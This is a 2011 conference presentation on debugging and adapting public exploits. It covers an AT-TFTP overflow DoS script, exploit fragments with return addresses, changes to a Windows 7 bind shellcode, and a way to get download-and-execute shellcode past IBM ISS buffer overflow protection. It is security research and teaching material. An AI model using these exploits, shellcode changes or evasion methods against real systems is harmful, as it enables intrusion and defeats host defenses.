customizing public exploits
Péter Gara-Tarnóczi's presentation at the Hacktivity 2011 conference
CUSTOMIZING PUBLIC EXPLOITS: CASE STUDIES
Hacktivity 2011 – Péter Gara-Tarnóczi
Previously on ...: Offsec PWB + Hacktivity 2009
Prerequisites: stack buffer overflow + Windows shellcodes + scripting languages + x86 Assembly
Introduction
Inspiration & Idea & Sources
Several exploits that I downloaded from the Internet didn't work when I tested them on vulnerable systems. I had to modify their code to compromise those systems successfully.
Some exploits were accidentally buggy or intentionally limited; others supported various versions of Windows but not the one I had.
I realized that I could categorize the problems and that I had found cases for those categories. I decided to build a presentation around case studies to introduce some of them.
Two information sources provided material for my research:
Lab exercises of Offensive Security's Penetration Testing with BackTrack course
My own presentation, Windows Shellcodes in Malware, at Hacktivity 2009
Some Problem Categories
Buggy code: it works only if special conditions are met. I think such exploits were debugged in a single environment without deep knowledge of the vulnerability details.
Portability problems: the exploit works on other operating system versions but not on the one you are testing.
Security evasion: the code needs to evade a line of defense.
Expected knowledge
Required:
Solid knowledge about stack buffer overflow exploits
Basic knowledge about shellcodes
Advantageous:
Practical knowledge about x86 Assembly
Basic knowledge about scripting languages (Perl, Python, Ruby)
AT-TFTP Server Long Filename Buffer Overflow
CVE-2006-6184
Exploits: Cervini, qnix, Webster
Case Study I: Buggy Exploits
CS1: AT-TFTP Server Long Filename BO
2006: Liu Qixu and Zhang Yuqing developed a fuzzer to find overflows in free TFTP applications.
Qixu announced a stack buffer overflow vulnerability in Allied Telesyn TFTP Server version 1.9 on the Bugtraq list.
2007: they published the results of their research in a paper titled TFTP Vulnerability Exploiting Technique Based on Fuzzing. The title and abstract are in English; the rest of the text is in Chinese.
Official source: http://en.cnki.com.cn/Article_en/CJFDTOTAL-JSJC200720051.htm
CS1: Protocol Basics
TFTP clients can read (GET) a file from and write (PUT) a file to a TFTP server.
GET command: 00 01 [fname] 00 [tmode] 00
PUT command: 00 02 [fname] 00 [tmode] 00
AT-TFTP 1.9 handles the filename properly while processing network packets, but it makes a mistake when it generates a log entry.
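To make the request layout above concrete, here is a minimal sketch of a parser for the two request types. It is not taken from the slides; the function name parse_tftp_request and the sample filename are assumptions used only for illustration.

```python
import struct

# Opcodes of the two request types shown on the slide.
OPCODES = {1: "read", 2: "write"}


def parse_tftp_request(packet):
    """Split a TFTP read/write request into (operation, fname, tmode)."""
    if len(packet) < 4:
        raise ValueError("packet too short")
    # The first two bytes are a big-endian opcode: 00 01 or 00 02.
    (opcode,) = struct.unpack("!H", packet[:2])
    if opcode not in OPCODES:
        raise ValueError("not a read or write request")
    # fname and tmode are NUL-terminated strings that follow the opcode.
    fields = packet[2:].split(b"\x00")
    if len(fields) < 3:
        raise ValueError("fname or tmode is not NUL-terminated")
    fname = fields[0].decode("ascii", "replace")
    tmode = fields[1].decode("ascii", "replace")
    return OPCODES[opcode], fname, tmode


print(parse_tftp_request(b"\x00\x01boot.cfg\x00netascii\x00"))
```

The parser only separates the fields; it deliberately puts no limit on the filename length, which mirrors the point that the packet handling itself is not where the problem lies.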
CS1: Ordinary Log Entries
CS1: Vulnerability
The logging method uses a fixed-size (256-byte) local variable to store an entry (without date and time).
It executes the following type of C instruction:
wvsprintf(buffer,"%s requested to %s file %s in format %s\r\n",clientip,operation,fname,tmode)
clientip: e.g. 192.168.1.1
operation: read or write
fname: filename
tmode: e.g. netascii
An attacker can overflow "buffer" by sending a long filename.
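The size problem can be checked with simple arithmetic. The sketch below rebuilds the log entry from the format string quoted above and compares its length with the 256-byte buffer; the helper names log_entry and fits_buffer and the sample values are assumptions, not part of the original server code.

```python
BUFFER_SIZE = 256  # size of the local variable named on the slide
LOG_FORMAT = "%s requested to %s file %s in format %s\r\n"


def log_entry(clientip, operation, fname, tmode):
    """Build the log entry text the same way the format string does."""
    return LOG_FORMAT % (clientip, operation, fname, tmode)


def fits_buffer(entry):
    """True if the entry plus its terminating NUL fits into the buffer."""
    return len(entry) + 1 <= BUFFER_SIZE


ordinary = log_entry("192.168.1.1", "read", "boot.cfg", "netascii")
oversized = log_entry("192.168.1.1", "write", "A" * 227, "netascii")
print(len(ordinary), fits_buffer(ordinary))
print(len(oversized), fits_buffer(oversized))
```

A bounded formatting routine, or a length check like fits_buffer before formatting, is the kind of guard that is missing in the logging method described here.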
CS1: Liu Qixu’s DoS Exploit (Python)
import socket
import sys
host = '192.168.1.11'
port = 69
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
    print "socket() failed"
    sys.exit(1)
filename = "A" * 227
mode = "netascii"
data = "\x00\x02" + filename + "\0" + mode + "\0"
s.sendto(data, (host, port))
CS1: Controlled Exploitability
CS1: Execution Redirection
The filename has to start with the attacker's code (a read/write packet has limited size).
We need to jump based on the content of [return address + 4 + 0x28]:
we should find a call/jmp [esp+0x28] instruction, or
we should put add esp,0x28 and ret instructions (83 c4 28 c3) behind the return address on the stack and find a call/jmp esp instruction.
CS1: Shellcode Length Calculation
Buffer + EBP: 256 + 4 == 260 bytes
[clientip] requested to write file [fname] ...
[len____1]1234567890123456789012345[len_2]
length(clientip) + 25 + length(fname to return addr) == 260
length(fname to return addr) == 260 - 25 - length(clientip)
maximum of length(clientip) == 15
length(fname to return addr) == length(NOPs + shellcode)
length(shellcode) <= 260 - 25 - 15 == 220
length(clientip) == 260 - 25 - length(NOPs + shellcode)
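The calculation above is plain arithmetic, so it can be double-checked with a short script. This is only a sketch; the constant and function names are assumptions introduced for illustration.

```python
FRAME_BYTES = 256 + 4                      # local buffer plus saved EBP
FIXED_TEXT = " requested to write file "  # constant text between clientip and fname


def fname_bytes_before_return_address(clientip):
    """Number of filename bytes that precede the return address for a given client IP."""
    return FRAME_BYTES - len(FIXED_TEXT) - len(clientip)


def required_clientip_length(filler_length):
    """Client IP length that a fixed-length filename prefix implicitly requires."""
    return FRAME_BYTES - len(FIXED_TEXT) - filler_length


print(len(FIXED_TEXT))
print(fname_bytes_before_return_address("255.255.255.255"))
print(required_clientip_length(227))
```

The second function makes the dependency explicit: any prefix of constant length is correct for exactly one client IP length.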
CS1: Jacopo Cervini’s Exploit (Perl)
$pad = "\x90"x63;
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
$shellcode = "...";
$eip="\xf4\xf5\xe3\x75"; #call [ESP+28] in IMM32.dll on win2k Server SP4 Italian
$mode = "netascii";
$exploit = "\x00\x02" . $pad . $shellcode . $eip . "\0" . $mode . "\0";
length(clientip) == 260 - 25 - (63 + 164) == 8
e.g. client 10.1.1.1, server 10.1.1.2
CS1: qnix’s Exploit (Python)
nops_number1=23-len(host)
nops1 = "\x90"*nops_number1
nops_number2 = 210 - len(shellcode)
nops2 = "\x90"*nops_number2
buffer = "\x00\x02" + nops1 + nops2 + shellcode + return_address + esp + "\x00" + "netascii" + "\x00"
length(clientip) == 260 - 25 - length(NOPs + shellcode) == 235 - (23 - length(serverip) + 210 -length(shellcode) + length(shellcode)) == 235 - 23 + length(serverip) - 210 == length(serverip) + 2
e.g. client 192.168.1.101, server 192.168.1.1
CS1: Bugs in Previous Exploits
Cervini: it uses a constant length of (NOPs + shellcode), which fixes the length of clientip.
qnix: it uses a wrong formula; two modifications are needed:
23 → 25
serverip → clientip
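The difference between the padding formulas can be compared numerically. The sketch below computes, for each formula, how many bytes of client IP and filename end up in front of the return address; the value must be 260 - 25 == 235. It assumes that the payload area is filled to exactly 210 bytes in the qnix and Webster variants, and the function names are hypothetical.

```python
EXPECTED = 260 - 25  # bytes of clientip plus filename that must precede the return address


def offset_cervini(clientip, serverip):
    # Constant prefix: 63 NOPs plus a 164-byte payload.
    return len(clientip) + 63 + 164


def offset_qnix(clientip, serverip):
    # Padding depends on the server address and uses 23 as the constant.
    return len(clientip) + (23 - len(serverip)) + 210


def offset_webster(clientip, serverip):
    # Padding depends on the client address and uses 25 as the constant.
    return len(clientip) + (25 - len(clientip)) + 210


for client, server in [("10.1.1.1", "10.1.1.2"), ("192.168.1.101", "192.168.1.1")]:
    for formula in (offset_cervini, offset_qnix, offset_webster):
        print(client, server, formula.__name__, formula(client, server) == EXPECTED)
```

Only the third formula is independent of the addresses involved, which matches the observation that the first two work only under special conditions.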
CS1: Patrick Webster’s Exploit (Ruby)
'Payload' =>
{
'Space' => 210,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
...
sploit = "\x00\x02" + make_nops(25 - datastore['LHOST'].length)
sploit << payload.encoded
sploit << [target['Ret']].pack('V') # <-- eip = jmp esp. we control it.
sploit << "\x83\xc4\x28\xc3" # <-- esp = add esp 0x28 + retn
sploit << "\x00" + "netascii" + "\x00"
This Metasploit code uses the right formula, but there may be a problem with one of the return addresses.
CS1: Return Addresses of the Exploit
Some contributors extended the list of return addresses in Webster’s exploit
'Targets' =>
[
# Patrick - Tested OK w2k sp0, sp4, xp sp 0, xp sp2 - en 2007/08/24
[ 'Windows NT SP4 English', { 'Ret' => 0x702ea6f7 } ],
...
[ 'Windows XP SP2 English', { 'Ret' => 0x71ab9372 } ],
[ 'Windows XP SP3 English', { 'Ret' => 0x7e429353 } ], # ret by c0re
[ 'Windows Server 2003', { 'Ret' => 0x7c86fed3 } ], # ret donated by securityxxxpert
[ 'Windows Server 2003 SP2', { 'Ret' => 0x7c86a01b } ], # ret donated by Polar Bear
],
CS1: Problem of Return Addresses
Right return addresses:
Win2k3 SP0 w/o hotfixes: 0x77fb8bab
Win2k3 SP1 w/o hotfixes: 0x7c86fed3
I think the contributor simply got the SP level of Windows 2003 wrong.
CS1: AT-TFTP Metasploit Demo
Small Portable Bind Shellcode on Windows 7
Original code: Stuttard, Extended code: SkyLined, Windows 7 Professional compatible code: GTP
Case Study II: Portability
CS2: Main Elements of Win Shellcodes
Decoding routine (if encoding is needed to eliminate bad chars)
Calculating memory addresses of system functions
  Using hard-coded addresses is not portable
  Starting with a search for the kernel32.dll location is much better
    Byte sequence search (obsolete)
    SEH-based (rare but remarkable)
    PEB-based (usual)
  Searching for the addresses of GetProcAddress and LoadLibraryA and calling them as often as needed, and/or
  Searching for addresses by proper library and function hashes
Calling system functions in the expected order
CS2: PEB Technique in Windows 7
before Windows 7
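mov eax, fs:[30h]    ; eax = PEB
mov eax, [eax+0Ch]   ; eax = PEB->Ldr
mov esi, [eax+1Ch]   ; esi = first entry of InInitializationOrderModuleList
lodsd                ; eax = second entry of the list
mov ebp, [eax+8]     ; ebp = base address of that module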
before and on Windows 7
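xor ecx, ecx
mov eax, fs:[ecx+30h]  ; eax = PEB
mov eax, [eax+0Ch]     ; eax = PEB->Ldr
mov esi, [eax+1Ch]     ; esi = first entry of InInitializationOrderModuleList
next_module:
mov ebp, [esi+08h]     ; ebp = base address of the module
mov edi, [esi+20h]     ; edi = pointer to the module name (Unicode)
mov esi, [esi]         ; esi = next entry of the list
cmp [edi+12*2], cl     ; does the name end after 12 characters ("kernel32.dll")?
jnz next_module        ; no: check the next module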
CS2: Small Portable Win Shellcode
2005: Dafydd Stuttard created a portable bind shellcode for Windows. Its size was 191 bytes. He wrote an article, Writing Small Shellcode, to present the logic behind his code.
2009: Berend-Jan Wever (SkyLined) modified Stuttard's shellcode to improve it. One of the relevant improvements was Windows 7 compatibility. The size of the shellcode, after some optimization, was 211 bytes.
2011: I tested SkyLined's code by building it into an exploit and found that it was not compatible with Windows 7 Professional.
CS2: Reducing Hash Size
Windows shellcodes calculate the memory addresses of system functions using a simple hash algorithm. It typically generates 4-byte hashes.
Stuttard refined an important rule of the hashing method:
Basic requirement: "It avoids collisions within each library for the specific functions we need to locate."
Stuttard's rule: "We can tolerate hash collisions in the functions we need to locate, provided that we iterate through the exported functions in a defined sequence, and the correct function is the first match against each of our hashes."
Result: Stuttard (and later SkyLined) used 1-byte hashes.
CS2: Hashing Methods
Stuttard
xor edi, edi
next_function_loop:
inc edi
mov esi, [ebx + edi * 4]
add esi, ebp
cdq
hash_loop:
lodsb
xor al, 0x71
sub dl, al
cmp al, 0x71
jne hash_loop
cmp dl, [esp + 0x1c]
jnz next_function_loop
SkyLined
xor edx, edx
next_function_loop:
inc edx
mov esi, [ecx + edx * 4]
add esi, ebp
mov ah, hash_start_value
hash_loop:
lodsb
xor al, hash_xor_value
sub ah, al
cmp al, hash_xor_value
jne hash_loop
cmp ah, [edi]
jnz next_function_loop
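For readers who prefer a high-level view, the following sketch models SkyLined's hash loop shown above: the accumulator starts at hash_start_value, and every byte of the name, including the terminating zero, is XORed with hash_xor_value and subtracted modulo 256. The function name one_byte_hash is an assumption; the parameter values are the ones quoted for SkyLined's code elsewhere in this presentation.

```python
def one_byte_hash(name, start_value, xor_value):
    """Model of the 1-byte hash loop: subtract (byte XOR xor_value) for each byte."""
    acc = start_value
    # The loop stops after the terminating NUL, so the NUL is hashed as well.
    for byte in name.encode("ascii") + b"\x00":
        acc = (acc - (byte ^ xor_value)) & 0xFF
    return acc


for function_name in ("accept", "bind", "listen", "LoadLibraryA"):
    print(function_name, hex(one_byte_hash(function_name, 0x36, 0x71)))
```

Because only one byte of state survives, many different names map to the same value, which is why the order of the export list matters.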
CS2: Hashing limitations
A 1-byte hash produces several collisions.
SkyLined generalized the hashing method using two parameters (hash_start_value and hash_xor_value) but added a restriction in order to reduce the size of the shellcode. He fixed the 'w' character, part of the 'ws2_32' string, as the hash of the 'accept' function.
This restriction creates a dependency between hash_start_value and hash_xor_value.
If you choose a XOR value, only one START value is correct. SkyLined used:
XOR value: 0x71
START value: 0x36
hash('accept') == 0x77 == 'w'
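The dependency can be written down directly: since the hash is the start value minus a sum, the start value is the wanted hash plus that sum, modulo 256. The sketch below assumes the subtract-and-XOR hash described in this case study; the function name start_value_for is hypothetical.

```python
def start_value_for(xor_value, name="accept", wanted_hash=ord("w")):
    """Return the only start value for which hash(name) equals wanted_hash."""
    # Sum of (byte XOR xor_value) over the name and its terminating NUL.
    total = sum(byte ^ xor_value for byte in name.encode("ascii") + b"\x00")
    return (wanted_hash + total) & 0xFF


print(hex(start_value_for(0x71)))
print(hex(start_value_for(0xF0)))
```

With this relation, a parameter search only has to iterate over the 256 possible XOR values.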
CS2: Necessary system functions
kernel32.dll
CreateProcessA 0xb7
LoadLibraryA 0x8f
ws2_32.dll
WSAStartup 0x09
WSASocketA 0x98
bind 0x66
listen 0x56
accept 0x77
CS2: Problem in SkyLined’s code
0xb7
CreateProcessA
GetModuleHandleExA
GetNumaProcessorNodeEx
TryAcquireSRWLockShared
UnregisterConsoleIME
0x8f
BaseCheckAppcompatCacheEx
LoadLibraryA
UnregisterWaitEx
ZombifyActCtx
BaseCheckAppcompatCacheEx is not in kernel32.dll on Win7 Release Candidate.
It is in kernel32.dll on Win7 Beta and Win7 Professional Release.
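The effect of the extra export can be reproduced with a first-match lookup over an ordered name list. This is a simplified sketch: the two short lists stand in for the real export tables, and the function names are assumptions.

```python
def one_byte_hash(name, start_value, xor_value):
    """Subtract (byte XOR xor_value) for each byte of the name and its NUL."""
    acc = start_value
    for byte in name.encode("ascii") + b"\x00":
        acc = (acc - (byte ^ xor_value)) & 0xFF
    return acc


def first_match(export_names, wanted_hash, start_value=0x36, xor_value=0x71):
    """Return the first name in export order whose hash equals wanted_hash."""
    for name in export_names:
        if one_byte_hash(name, start_value, xor_value) == wanted_hash:
            return name
    return None


# Stand-ins for two export tables, listed in alphabetical order.
without_extra_export = ["CreateProcessA", "LoadLibraryA", "UnregisterWaitEx"]
with_extra_export = ["BaseCheckAppcompatCacheEx", "CreateProcessA", "LoadLibraryA"]

print(first_match(without_extra_export, 0x8F))
print(first_match(with_extra_export, 0x8F))
```

In the second list the colliding name comes first, so the lookup resolves the wrong function even though the hash value itself is unchanged.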
CS2: Right Parameter Search
I developed two simple Python scripts:
The 1st script calculated the hashes of the system functions exported by a DLL file.
The 2nd script calculated hash_start_value based on an input hash_xor_value and the 'accept' restriction.
I found a few good values that allowed CreateProcessA and LoadLibraryA to be the top functions in their own lists.
Unfortunately, ws2_32 caused another problem...
CS2: Other Params (s:0xb7, x:0xf0)
0xb3
CreateProcessA
CreateSymbolicLinkTransactedW
GetNumaProcessorNodeEx
GetSystemFileCacheSize
IsValidCodePage
LoadAppInitDlls
QueryThreadpoolStackInformation
0x91
LoadLibraryA
LoadStringBaseExW
LocalAlloc
0x92
WSAConnect
WSARecvDisconnect
WSASocketA
0x09
WSAStartup
WSCInstallNameSpaceEx
0x6a
bind
0x58
listen
0x77
accept
CS2: Problem Solution
The only problem is the position of WSASocketA.
Why should we use WSASocketA if we have the opportunity to use WSASocketW instead?
The ASCII and the Unicode versions of WSASocket are functionally equivalent, and there are no differences between the input parameters.
0x9c
WSASocketW
CS2: Code Modification
hash_xor_value equ 0xF0
hash_start_value equ 0xB7
hash_kernel32_CreateProcessA equ 0xB3
hash_kernel32_LoadLibraryA equ 0x91
hash_ws2_32_WSAStartup equ 0x09
hash_ws2_32_WSASocketA equ 0x9C ; hash of WSASocketW
hash_ws2_32_bind equ 0x6A
hash_ws2_32_listen equ 0x58
hash_ws2_32_accept equ 0x77
IBM ISS Buffer Overflow Exploit Prevention
Animated Cursor Buffer Overflow (CVE-2007-0038)
Exploits: asus.tw, Metasploit, GTP I, GTP II
Case Study III: HIPS evasion
CS3: IBM ISS HIPS Technology
This HIPS has separate network and application defense functionality.
Each of them contains three different layers:
Network defense (firewall, classic IPS, BOEP)
Application defense (traditional AV, VPS, application control)
In this case I deal with the "last line of network defense", Buffer Overflow Exploit Prevention.
I'd like to demonstrate how I can evade BOEP.
CS3: BOEP
"... IPS agent monitors system calls commonly used by malicious code."
"By watching the use of Stack and Heap system memory, the agent identifies when a buffer overflow has succeeded and prevents the attack's payload from running."
These two sentences are the basis of the BOEP technology in this HIPS. By running a rootkit detector application, I found that the HIPS hooked three kernel-implemented functions:
NtCreateFile
NtCreateProcess
NtCreateProcessEx
CS3: Concept vs. Implementation
Simple evasion: exploiting a vulnerability by evading the concept, e.g. executing the shellcode from another memory area (neither stack nor heap).
Case Study I: the code runs in the data segment.
It was tested and really evaded the HIPS.
I wanted to know whether I could create code that avoids detection by exploiting an implementation bug.
CS3: Article about BOEP Evasion
Jamie Butler, Anonymous I and Anonymous II wrote an article titled Bypassing 3rd Party Windows Buffer Overflow Protection, which was published in Phrack magazine No. 62 in 2004.
This article contained details about stack backtracing, kernel hook evasion and userland hook evasion.
"Stack backtracing involves traversing stack frames and verifying that the return addresses pass the buffer overflow detection tests..."
"The existing commercial BOPT's kernel components rely entirely on stack backtracing to detect shellcode execution. Therefore, evading a kernel hook is simply a matter of defeating the stack backtracing mechanism."
CS3: Standard function entries
call func1
...
func1:
push ebp
mov ebp, esp ; ebp points to the top of the stack
...
call func2
...
func2:
push ebp ; saves top of the previous stack frame
mov ebp, esp ; ebp points to the top of the stack
...
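With standard function entries, every frame stores the caller's EBP at [ebp] and the return address at [ebp+4], so the frames form a linked list. The sketch below walks such a chain over a toy memory model and flags return addresses that point into a writable region. The addresses, the function names and the policy in looks_injected are assumptions for illustration and do not describe any particular product.

```python
def backtrace(memory, ebp):
    """Follow the saved-EBP chain and collect the return address of each frame."""
    return_addresses = []
    while ebp in memory and ebp + 4 in memory:
        return_addresses.append(memory[ebp + 4])  # [ebp+4] = return address
        ebp = memory[ebp]                         # [ebp]   = caller's saved EBP
    return return_addresses


def looks_injected(address, writable_ranges):
    """Hypothetical check: does the address lie inside a stack or heap range?"""
    return any(low <= address < high for low, high in writable_ranges)


# Toy memory: address -> 32-bit value (all values are made up).
memory = {
    0x0012FF00: 0x0012FF40,  # func2 frame: saved EBP of func1
    0x0012FF04: 0x00401050,  # func2 frame: return address into func1
    0x0012FF40: 0x00000000,  # func1 frame: saved EBP of the caller (end of chain)
    0x0012FF44: 0x00401010,  # func1 frame: return address into the caller
}
stack_range = [(0x00120000, 0x00130000)]

for address in backtrace(memory, 0x0012FF00):
    print(hex(address), looks_injected(address, stack_range))
```

The walk depends entirely on EBP holding a valid frame pointer at every level, which is the assumption the rest of this case study examines.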
CS3: Stack Backtracing
CS3: Vulnerability for Test
Animated Cursor Buffer Overflow (CVE-2007-0038)
It was a stack buffer overflow vulnerability.
Some peculiarities:
Existing exploits didn't load the shellcode directly onto the stack.
The content of the ANI file was loaded into memory as a mapped file. A carefully chosen overwrite of the return address redirected the execution flow to the shellcode placed in that memory area.
Since that memory area was read-only and the shellcode performed local write operations, the code contained a routine to copy the relevant code to the heap (asus.tw and other online exploits) or to the stack (Metasploit).
I configured the classic IPS component of the HIPS to ignore ANI header overflow and ANI ratenumber DoS events.
CS3: Vulnerability & Exploit
CS3: Exploits for Test
I modified the asus.tw exploit slightly (by more than a single bit)
poc.ani (ASUS)
I used the ANI exploit of Metasploit
ani_loadimage_chunksize script (Metasploit)
I created a new exploit that loaded the shellcode directly onto the stack
poc2.ani (GTP I)
I modified the previous exploit (poc2.ani) so that it evaded BOEP successfully
poc3.ani (GTP II)
CS3: 1st Test
Test exploit: ASUS
System calls:
GlobalAlloc
LoadLibraryA
URLDownloadToCacheFileA
CreateProcessA
CS3: 2nd Test
Test exploit: Metasploit
System calls:
GetProcAddress
LoadLibraryA
GetSystemDirectoryA
URLDownloadToFileA
WinExec
ExitThread
CS3: Log Analysis of 2nd Test
0013e087: call [kernel32.dll]WinExec
77e69a00: call [kernel32.dll]CreateProcessInternalA
77e78b32: call [kernel32.dll]CreateProcessInternalW
77e526fc: call [ntdll.dll]ZwCreateProcessEx
77f4254d: call 7ffe0300
7ffe0302: sysenter
CS3: My Stack Exploit
Basic idea: if you choose a bigger ANIH length, you will be able to load your shellcode directly onto the stack.
Be careful! Some instructions in the vulnerable user32.dll overwrite two bytes of the shellcode on the stack. These two bytes are at a fixed position (independent of the shellcode), so I had to insert a short JMP instruction with a few NOPs at this part of the shellcode.
I used the standard windows/download_exec shellcode of Metasploit without its XOR encoding.
CS3: 3rd Test
Test exploit: GTP I
System calls:
GetProcAddress
LoadLibraryA
GetSystemDirectoryA
URLDownloadToFileA
WinExec
ExitThread
CS3: NtCreateProcessEx???
Did you spot an oddity in the results of these tests?
The HIPS detected BOEP events in all tests, but only at NtCreateProcessEx, after URLDownloadTo(Cache)FileA had already created a new file on the system.
URLDownloadTo(Cache)FileA calls CreateFileA to create a new file, and the call chain is CreateFileA → CreateFileW → ZwCreateFile → NtCreateFile, so the HIPS should detect a BOEP event at NtCreateFile, but it misses it.
URLDownloadTo(Cache)FileA contains several inner calls before reaching NtCreateFile. Stack backtracing stops before reaching the original caller.
"Without an EBP register it is not possible for the buffer overflow detection technologies to accurately perform stack backtracing." – Phrack No. 62
CS3: Non-standard function entries
Some functions don't save EBP on the stack.
Stack backtracing can handle this behavior if the value in EBP is not altered by the program code and is stored on the stack later.
In that case the method jumps over some intermediate stack frames and finds an earlier one.
"Modern compilers often omit the use of EBP as a frame pointer and use it as a general purpose register instead." – Phrack No. 62
This is a real problem when security software uses stack backtracing: if EBP is used as a general-purpose register, "push ebp" stores an arbitrary value on the stack.
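The frame-skipping effect can be shown with a small simulation. Each nested call pushes a return address; only functions with a standard entry also push EBP and update it. The walker then sees just the frames that were linked this way. The function names f1 to f3 and the list-based stack model are assumptions; on real x86 the return address sits at [ebp+4] rather than one slot below the saved EBP in a list.

```python
def visible_callers(chain):
    """chain: list of (caller_name, callee_saves_ebp), outermost call first.

    Returns the callers whose return addresses a saved-EBP walk would find.
    """
    stack = []   # simulated stack; a larger index means a more recent push
    ebp = None   # index of the most recent saved-EBP slot
    for caller, callee_saves_ebp in chain:
        stack.append(("ret", caller))      # CALL pushes the return address
        if callee_saves_ebp:
            stack.append(("ebp", ebp))     # push ebp
            ebp = len(stack) - 1           # mov ebp, esp
    seen = []
    while ebp is not None:
        seen.append(stack[ebp - 1][1])     # return address stored next to saved EBP
        ebp = stack[ebp][1]                # follow the chain to the previous frame
    return seen


# caller -> f1 (saves EBP) -> f2 (does not save EBP) -> f3 (saves EBP)
chain = [("caller", True), ("f1", False), ("f2", True)]
print(visible_callers(chain))
```

The return address into f1 is never inspected because f2 did not link a frame, which illustrates how intermediate frames drop out of the walk.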
CS3: My Winner Stack Exploit
Basic idea: choose another execution function that has a more complicated calling sequence!
[Shell32.dll]ShellExecuteA seemed to be a good choice.
I used the following parameterized call:
ShellExecuteA(null,"open",<fname>,null,null,null)
CS3: Stack Backtracing Failure
Call chain, innermost function first (← means "called by"):
NtCreateProcessEx ← ZwCreateProcessEx ← CreateProcessInternalW ← CreateProcessW ← Shell32.773955E0 ← Shell32.773954D5 (no saved EBP!) ← Shell32.77395000 (no saved EBP!) ← Shell32.77394F03 ← Shell32.77395053 ← ShellExecuteExW ← ShellExecuteExA ← ShellExecuteA
Stack backtracing terminates at the call of CreateProcessW in shell32.dll.
CS3: 4th Test
Test exploit: GTP II
System calls:
GetProcAddress
LoadLibraryA
GetSystemDirectoryA
URLDownloadToFileA
ShellExecuteA
ExitThread
THANK YOU FOR YOUR INTEREST!
cm[dot]peter[dot]gara[at]gmail[dot]com